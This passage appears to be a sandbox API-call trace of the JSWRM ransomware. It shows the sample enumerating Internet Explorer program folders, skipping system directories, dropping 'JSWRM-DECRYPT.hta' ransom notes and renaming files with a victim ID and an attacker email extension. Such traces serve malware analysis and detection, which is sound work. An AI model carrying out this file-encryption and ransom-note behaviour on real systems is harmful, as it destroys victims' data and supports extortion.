(lpString1="Internet Explorer", lpString2="documents and settings") returned 1 [0069.359] lstrcmpiW (lpString1="Internet Explorer", lpString2="$RECYCLE.BIN") returned 1 [0069.359] lstrcmpiW (lpString1="Internet Explorer", lpString2="system volume information") returned -1 [0069.359] lstrcmpiW (lpString1="Internet Explorer", lpString2="msocache") returned -1 [0069.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0069.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0069.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0069.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0069.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0069.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\internet explorer\\jswrm-decrypt.hta")) returned 0xffffffff [0069.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0069.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24a1c0 [0069.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0069.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24bf90 [0069.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24a1c0 | out: hHeap=0x1e0000) returned 1 [0069.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0069.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0069.360] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\internet explorer\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0069.361] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.361] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0069.362] CloseHandle (hObject=0x450) returned 1 [0069.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf90 | out: hHeap=0x1e0000) returned 1 [0069.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0069.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0069.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0069.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0069.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0069.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0069.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\internet explorer\\jswrm-decrypt.hta")) returned 0x20 [0069.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0069.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0069.362] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d83195, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2000eabb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf0988, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0069.363] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.363] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d83195, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2000eabb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.363] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.363] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.363] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d83d92, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa21685bc, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0069.363] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0069.363] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0069.363] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0069.363] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0069.363] lstrcmpiW (lpString1="en-US", lpString2="recovery") returned -1 [0069.363] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0069.363] lstrcmpiW (lpString1="en-US", lpString2="documents and settings") returned 1 [0069.363] lstrcmpiW (lpString1="en-US", lpString2="$RECYCLE.BIN") returned 1 [0069.363] lstrcmpiW (lpString1="en-US", lpString2="system volume information") returned -1 [0069.363] lstrcmpiW (lpString1="en-US", lpString2="msocache") returned -1 [0069.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0069.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0069.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0069.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0069.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0069.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\internet explorer\\en-us\\jswrm-decrypt.hta")) returned 0xffffffff [0069.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c1c4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24b1c8 [0069.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24cf98 [0069.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0069.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0069.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0069.364] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\internet explorer\\en-us\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0069.364] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.364] WriteFile (in: hFile=0x3d4, lpBuffer=0x345c2d8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c2a4, lpOverlapped=0x0 | out: lpBuffer=0x345c2d8*, lpNumberOfBytesWritten=0x345c2a4*=0x230c, lpOverlapped=0x0) returned 1 [0069.365] CloseHandle (hObject=0x3d4) returned 1 [0069.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24cf98 | out: hHeap=0x1e0000) returned 1 [0069.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0069.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0069.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0069.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0069.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0069.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0069.365] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\internet explorer\\en-us\\jswrm-decrypt.hta")) returned 0x20 [0069.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0069.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0069.366] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\*.*", lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d83d92, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2000eabb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName=".", cAlternateFileName="")) returned 0x232040 [0069.366] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.366] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d83d92, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2000eabb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName="..", cAlternateFileName="")) returned 1 [0069.366] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.366] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.366] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b2dfe94, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7f0f18af, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x68e10600, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName="hmmapi.dll.mui", cAlternateFileName="")) returned 1 [0069.366] lstrcmpiW (lpString1="hmmapi.dll.mui", lpString2=".") returned 1 [0069.366] lstrcmpiW (lpString1="hmmapi.dll.mui", lpString2="..") returned 1 [0069.366] lstrcmpiW (lpString1="hmmapi.dll.mui", lpString2="...") returned 1 [0069.366] lstrcmpiW (lpString1="hmmapi.dll.mui", lpString2="windows") returned -1 [0069.366] lstrcmpiW (lpString1="hmmapi.dll.mui", lpString2="recovery") returned -1 [0069.366] lstrcmpiW (lpString1="hmmapi.dll.mui", lpString2="perflogs") returned -1 [0069.366] lstrcmpiW (lpString1="hmmapi.dll.mui", lpString2="documents and settings") returned 1 [0069.366] lstrcmpiW (lpString1="hmmapi.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0069.366] lstrcmpiW (lpString1="hmmapi.dll.mui", lpString2="system volume information") returned -1 [0069.366] lstrcmpiW (lpString1="hmmapi.dll.mui", lpString2="msocache") returned -1 [0069.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0069.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hmmapi.dll.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hmmapi.dll.mui", cchWideChar=14, lpMultiByteStr=0x345f2a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hmmapi.dll.mui", lpUsedDefaultChar=0x0) returned 14 [0069.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0069.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hmmapi.dll.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hmmapi.dll.mui", cchWideChar=14, lpMultiByteStr=0x345f278, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hmmapi.dll.mui", lpUsedDefaultChar=0x0) returned 14 [0069.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0069.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0069.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.367] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\hmmapi.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.367] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=9174840420374528) returned 0 [0069.367] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0069.367] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0, lpNumberOfBytesRead=0x345ef6c*=0x0, lpOverlapped=0x0) returned 0 [0069.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0069.368] CloseHandle (hObject=0xffffffff) returned 1 [0069.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0069.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0069.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0069.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0069.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f5f8 [0069.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.368] MoveFileW (lpExistingFileName="C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\hmmapi.dll.mui"), lpNewFileName="C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\internet explorer\\en-us\\hmmapi.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0069.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.368] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b3c4cb5, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7f0f18af, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x75fdf500, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName="ieinstal.exe.mui", cAlternateFileName="")) returned 1 [0069.368] lstrcmpiW (lpString1="ieinstal.exe.mui", lpString2=".") returned 1 [0069.368] lstrcmpiW (lpString1="ieinstal.exe.mui", lpString2="..") returned 1 [0069.368] lstrcmpiW (lpString1="ieinstal.exe.mui", lpString2="...") returned 1 [0069.368] lstrcmpiW (lpString1="ieinstal.exe.mui", lpString2="windows") returned -1 [0069.368] lstrcmpiW (lpString1="ieinstal.exe.mui", lpString2="recovery") returned -1 [0069.368] lstrcmpiW (lpString1="ieinstal.exe.mui", lpString2="perflogs") returned -1 [0069.369] lstrcmpiW (lpString1="ieinstal.exe.mui", lpString2="documents and settings") returned 1 [0069.369] lstrcmpiW (lpString1="ieinstal.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0069.369] lstrcmpiW (lpString1="ieinstal.exe.mui", lpString2="system volume information") returned -1 [0069.369] lstrcmpiW (lpString1="ieinstal.exe.mui", lpString2="msocache") returned -1 [0069.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ieinstal.exe.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0069.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ieinstal.exe.mui", cchWideChar=16, lpMultiByteStr=0x241100, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ieinstal.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0069.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ieinstal.exe.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0069.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ieinstal.exe.mui", cchWideChar=16, lpMultiByteStr=0x2412e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ieinstal.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0069.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0069.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0069.369] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ieinstal.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.370] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=9655155203134792) returned 0 [0069.370] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0069.370] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0, lpNumberOfBytesRead=0x345ef6c*=0x0, lpOverlapped=0x0) returned 0 [0069.370] HeapFree (in: 